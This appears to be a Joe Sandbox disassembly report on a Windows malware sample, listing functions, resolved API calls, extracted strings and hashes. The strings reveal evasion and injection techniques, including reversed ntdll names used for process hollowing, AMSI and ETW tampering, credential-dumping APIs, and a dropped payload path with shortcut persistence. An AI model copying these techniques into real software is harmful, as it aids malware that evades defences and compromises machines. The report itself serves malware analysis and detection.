Opcode Fuzzy Hash: d4a31a5fe7634c622782e6d16aabf769081ef80f4dd376234e381225d84e14cf
Instruction Fuzzy Hash: FF112D756D0208BFEB04EFA4EC41F9EBBADEB48700F919460BD04D7640DA34AA51CF64

Function 02E58400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471

Strings

ntdll, xrefs: 02E58448
yromeMlautriVdaeRtN, xrefs: 02E5841B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: e11178e019a35da7085080b68604d19d0c2725ab06aef87f72630a7f21973851
Instruction ID: 8e75a470bc21a7257071df0026043c246644a4214f214bea99c59a0292bb86cf
Opcode Fuzzy Hash: e11178e019a35da7085080b68604d19d0c2725ab06aef87f72630a7f21973851
Instruction Fuzzy Hash: 3A012D756D0218AFEB10EFA8EC41E5EBBAEEB49700F519460BD04D7640DA34A951CF24

Function 02E57D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC

Strings

Ntdll, xrefs: 02E57DC3
yromeMlautriVetirW, xrefs: 02E57D93

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: ffc24a7a7df1a84d1daf4fdaa54e8d33f80b4e9f53a5e4193e7ea85b45747935
Instruction ID: 0dc219dcba5b80a64fd5396abfa7a8f8743a0c4e9e5cd162314eaf19c8b892cb
Opcode Fuzzy Hash: ffc24a7a7df1a84d1daf4fdaa54e8d33f80b4e9f53a5e4193e7ea85b45747935
Instruction Fuzzy Hash: ED0140756D0214AFDB00EF98EC42E5ABBEDEB49700F51E464BD04D7640DA34AD61CF64

Function 02E58670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5

Strings

noitceSfOweiVpamnUtN, xrefs: 02E5868B
ntdll, xrefs: 02E586B8

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: a3ed3f74c46eaa35baefa6d1d251dc1a23cfdd9c5f32981492a8377c1045ff85
Instruction ID: 85c76ea22ce7ff1f831283def4b7f5e400cc781c6f2ff1ffff480eb8051385bb
Opcode Fuzzy Hash: a3ed3f74c46eaa35baefa6d1d251dc1a23cfdd9c5f32981492a8377c1045ff85
Instruction Fuzzy Hash: 67014F346D0214AFEB04EBA9ED41F5ABBEEEB49700FA1D460BD00D7640DA74A981CE24

Function 02E5DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: cc80a6882c0e4c5ecfaf8bfb5641fe9658a28093d2249ffe0e92c018b2a78e7a
Instruction ID: d7691143ba29f8136bcba25ae8106add3a7fdb7dd756cd490ba64a7940e0fcb4
Opcode Fuzzy Hash: cc80a6882c0e4c5ecfaf8bfb5641fe9658a28093d2249ffe0e92c018b2a78e7a
Instruction Fuzzy Hash: BB01D635AD460CAEEB05EBA0DD51FCD77BEAB44304F5194D2E600FB081DAB4AB048B25

Function 02E5DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E

RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61

Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: b73eb5539eb09a25dfe978fd6f7034a8e9ce5b24b077503d422da6b51cd74700
Instruction ID: 93ac10486c68634278ba29a9ee0fc11db6cd6378ce67c43af46593b7f5c145e5
Opcode Fuzzy Hash: b73eb5539eb09a25dfe978fd6f7034a8e9ce5b24b077503d422da6b51cd74700
Instruction Fuzzy Hash: E9014471A9060CBEEB41EBA0DD52FCDB3BEEB48700F5194A1F600E2180EA746B048A64

Function 02E56DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02E56D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02E56DB9,?,?,?,00000000), ref: 02E56D99

CoCreateInstance.OLE32(?,00000000,00000005,02E56EAC,00000000,00000000,02E56E2B,?,00000000,02E56E9B), ref: 02E56E17

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 0acede53254d8b2159400a45de6f145d8fd88dcce7a7b7efe69ab9f8ee895161
Instruction ID: 39dd2894e69a43210a89bdc2455020af1ca387a736d253e110923ea90c170540
Opcode Fuzzy Hash: 0acede53254d8b2159400a45de6f145d8fd88dcce7a7b7efe69ab9f8ee895161
Instruction Fuzzy Hash: 9601F7712987046EF711EF61DC2296F7BADD749B00B919835F805E2680EE309A00C960

Function 02E68128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FBB7E0,02FBB824,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E686E9
ResumeThread.KERNEL32(00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8), ref: 02E68D33
CloseHandle.KERNEL32(00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380), ref: 02E68EB2

Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02EC7380,02E6B7B8,UacInitialize,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E692A4

Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67

Part of subcall function 02E5DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
Part of subcall function 02E5DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
Part of subcall function 02E5DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
Part of subcall function 02E5DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B

Part of subcall function 02E58338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4

ExitProcess.KERNEL32(00000000,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,Initialize,02EC7380,02E6B7B8,00000000,00000000,00000000,ScanString,02EC7380,02E6B7B8), ref: 02E6B2FA

Strings

NtGetWriteWatch, xrefs: 02E6AE7E
WriteVirtualMemory, xrefs: 02E6ABA5
NtQuerySystemInformation, xrefs: 02E6A976
OpenSession, xrefs: 02E68134, 02E682A8, 02E68324, 02E68621, 02E6877A, 02E68920, 02E68AAD, 02E68C41, 02E68DC0, 02E68EC3, 02E69037, 02E692B5, 02E694A5, 02E69796, 02E6991C, 02E69B77, 02E69D7D, 02E69F41, 02E6A230, 02E6A2DF, 02E6A51F, 02E6A716, 02E6A80E, 02E6ACC0, 02E6B288
DlpNotifyPreDragDrop, xrefs: 02E6A44D
sppwmi, xrefs: 02E6ADFC
Initialize, xrefs: 02E681B0, 02E683A0, 02E693AD, 02E69FBD, 02E6A35B, 02E6A88A, 02E6AC44, 02E6B190
NtOpenFile, xrefs: 02E6B0E2
NtSetSecurityObject, xrefs: 02E69276
BCryptVerifySignature, xrefs: 02E6A2A6
NtQueryVirtualMemory, xrefs: 02E6AEB1
EnumServicesStatusW, xrefs: 02E6A9C1
CreateProcessAsUserA, xrefs: 02E6AA1B
GetProcessMemoryInfo, xrefs: 02E6A148
NtOpenSection, xrefs: 02E6AF17
MiniDumpWriteDump, xrefs: 02E6924E
FlushInstructionCache, xrefs: 02E6ABD8
SLGatherMigrationBlob, xrefs: 02E6AE18
RetailTracerEnable, xrefs: 02E6A0AF
tquery, xrefs: 02E6A0C6
UacInitialize, xrefs: 02E6912F, 02E6954B
SLIsGenuineLocalEx, xrefs: 02E69ED5
LdrGetProcedureAddress, xrefs: 02E6B07C
NtQueryDirectoryFile, xrefs: 02E6A994
kernel32, xrefs: 02E6AAF0, 02E6AB23, 02E6AB56, 02E6AB89, 02E6ABBC, 02E6ABEF, 02E6AC22
RtlCreateQueryDebugBuffer, xrefs: 02E6A6DD
UacScan, xrefs: 02E6841C, 02E685A5, 02E686FE, 02E688A4, 02E68A31, 02E68BC5, 02E68D44, 02E68FBB, 02E69429, 02E69643, 02E69824, 02E699BD, 02E69BF3, 02E6AA63
NtCreateSection, xrefs: 02E6AF4A
endpointdlp, xrefs: 02E6A464, 02E6A497, 02E6A4CA, 02E6A4FD
ScanString, xrefs: 02E6822C, 02E68498, 02E68F3F, 02E69331, 02E6971A, 02E69AFB, 02E69DF9, 02E6A1B4, 02E6A59B, 02E6A792, 02E6AD3C
DlpCheckIsCloudSyncApp, xrefs: 02E6A480
spp, xrefs: 02E6A0F9, 02E6A12C, 02E6ADC9
EnumServicesStatusExW, xrefs: 02E6A9DF
DllGetClassObject, xrefs: 02E6A115, 02E6ADE5
VirtualAlloc, xrefs: 02E6AAD9
EtwEventWriteEx, xrefs: 02E6B115
NtMapViewOfSection, xrefs: 02E6AF7D
C:\Windows\System32\, xrefs: 02E686B3
ntdll, xrefs: 02E6922B, 02E6927B, 02E6928F, 02E6A628, 02E6A65B, 02E6A68E, 02E6A6C1, 02E6A6F4, 02E6AE95, 02E6AEC8, 02E6AEFB, 02E6AF2E, 02E6AF61, 02E6AF94, 02E6AFC7, 02E6AFFA, 02E6B02D, 02E6B060, 02E6B093, 02E6B0C6, 02E6B0F9, 02E6B12C, 02E6B15F
LdrLoadDll, xrefs: 02E6B049
ScanBuffer, xrefs: 02E68529, 02E687F6, 02E6899C, 02E68B29, 02E68CBD, 02E68E3C, 02E690B3, 02E691AB, 02E695C7, 02E698A0, 02E69A39, 02E69C6F, 02E69D01, 02E6A039, 02E6A3D7, 02E6A906, 02E6B20C
NtAlertResumeThread, xrefs: 02E6A611
NtOpenProcess, xrefs: 02E6928A
NtAccessCheck, xrefs: 02E6B016
EtwEventWrite, xrefs: 02E6B148
NtDeviceIoControlFile, xrefs: 02E6A985
advapi32, xrefs: 02E6923F
SLGetEncryptedPIDEx, xrefs: 02E6AE4B
RtlQueryProcessDebugInformation, xrefs: 02E6A9A3
I_QueryTagInformation, xrefs: 02E6923A
NtQueryInformationThread, xrefs: 02E6AEE4
CreateProcessW, xrefs: 02E6AA0C
CreateProcessA, xrefs: 02E6A9FD
Advapi, xrefs: 02E6A9B7, 02E6A9C6, 02E6A9D5, 02E6A9E4, 02E6AA20, 02E6AA2F, 02E6AA3E
NtWaitForSingleObject, xrefs: 02E6A677
dbgcore, xrefs: 02E69253, 02E69267
CreateProcessAsUserW, xrefs: 02E6AA2A, 02E6AA48
NtQuerySecurityObject, xrefs: 02E6AFE3
MZP, xrefs: 02E69992
SLGetSLIDList, xrefs: 02E69EA2
EnumServicesStatusExA, xrefs: 02E6A9D0
SetUnhandledExceptionFilter, xrefs: 02E6AC0B
OpenProcess, xrefs: 02E6AB72
bcrypt, xrefs: 02E6A2BD
RtlAllocateHeap, xrefs: 02E6A644, 02E6A6AA
mssip32, xrefs: 02E6A192
NtReadVirtualMemory, xrefs: 02E6AFB0
psapi, xrefs: 02E6A15F
NtWriteVirtualMemory, xrefs: 02E6B0AF
psapi, xrefs: 02E6A9F3
DlpGetArchiveFileTraceInfo, xrefs: 02E6A4B3
CryptSIPVerifyIndirectData, xrefs: 02E6A17B
SLGetGenuineInformation, xrefs: 02E69E6F
Kernel32, xrefs: 02E6AA02, 02E6AA11, 02E6AA4D
EnumProcessModules, xrefs: 02E6A9EE
VirtualProtect, xrefs: 02E6AB3F
SLLoadApplicationPolicies, xrefs: 02E69F08
DlpGetWebSiteAccess, xrefs: 02E6A4E6
MiniDumpReadDumpStream, xrefs: 02E69262
sppc, xrefs: 02E69E86, 02E69EB9, 02E69EEC, 02E69F1F, 02E6AE2F, 02E6AE62
EnumServicesStatusA, xrefs: 02E6A9B2
VirtualAllocEx, xrefs: 02E6AB0C
Ntdll, xrefs: 02E6A97B, 02E6A98A, 02E6A999, 02E6A9A8
CreateProcessWithLogonW, xrefs: 02E6AA39
SxTracerGetThreadContextDebug, xrefs: 02E6A0E2, 02E6ADB2
NtOpenObjectAuditAlarm, xrefs: 02E69226

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2769005614-3738268246
Opcode ID: f4b6e3afe16d0d6d75b74fc4e34b8bd7e152a5a83373a29b29fa3c48fcac9362
Instruction ID: 706c83623c6b7c14d21930b117d55f04b5ee6fc24b7ec56f2fa4414f0d1780f8
Opcode Fuzzy Hash: f4b6e3afe16d0d6d75b74fc4e34b8bd7e152a5a83373a29b29fa3c48fcac9362
Instruction Fuzzy Hash: A7431B74BC015D8BCB10EB64EC85ADE73B6EB84340F60E1E5B509EB654DE30AE928F41

Function 02E63E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Part of subcall function 02E5DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
Part of subcall function 02E5DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
Part of subcall function 02E5DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
Part of subcall function 02E5DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,02E6BB30,00000000,00000000,02E6BB24,00000000,00000000), ref: 02E640CB

Part of subcall function 02E588B8: LoadLibraryW.KERNEL32(amsi), ref: 02E588C1
Part of subcall function 02E588B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E58920

Sleep.KERNEL32(000003E8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,000003E8,ScanBuffer,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E64277

Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6

Sleep.KERNEL32(00004E20,UacScan,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacInitialize,02EC7380,02E6B7B8), ref: 02E650EE

Part of subcall function 02E5DC04: RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
Part of subcall function 02E5DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
Part of subcall function 02E5DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61

Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67

Part of subcall function 02E585BC: WinExec.KERNEL32(?,?), ref: 02E58624

Strings

OpenSession, xrefs: 02E64158, 02E64304, 02E64487, 02E648CB, 02E64AC0, 02E64C18, 02E64F00, 02E6517B, 02E652FB, 02E65634, 02E657CE, 02E6596E, 02E65B13, 02E65C87, 02E65ED7, 02E65F8B, 02E66248, 02E66340, 02E667EF, 02E66AC9, 02E66C3D, 02E66DD3, 02E66F83
HotKey=, xrefs: 02E66EE1
IconIndex=, xrefs: 02E66DAD
UacInitialize, xrefs: 02E64A44, 02E64E84, 02E650FF, 02E6553C, 02E658F2, 02E65DDF
UacUninitialize, xrefs: 02E63E1E, 02E6463E, 02E64C94, 02E65377
C:\Users\Public\alpha.exe, xrefs: 02E654E5
ScanBuffer, xrefs: 02E63FFB, 02E64202, 02E64380, 02E64503, 02E6457F, 02E64736, 02E64947, 02E64B3C, 02E64D8C, 02E64F7C, 02E651F7, 02E6546F, 02E656B0, 02E659EA, 02E65D03, 02E66083, 02E663BC, 02E66666, 02E6686B, 02E669D1, 02E66B45, 02E66BC1
Initialize, xrefs: 02E65876, 02E65C0B, 02E66007, 02E661CC, 02E66438, 02E6656E, 02E66773
.url, xrefs: 02E65D93
[InternetShortcut], xrefs: 02E66D48
/d , xrefs: 02E664B5
C:\\Users\\Public\\Libraries\\, xrefs: 02E6616F
UacScan, xrefs: 02E63F7F, 02E640DC, 02E64288, 02E6440B, 02E645DC, 02E646BA, 02E6484F, 02E64D10, 02E65079, 02E653F3, 02E65B8F, 02E660FF, 02E662C4, 02E665EA, 02E666F7, 02E66955, 02E66A4D
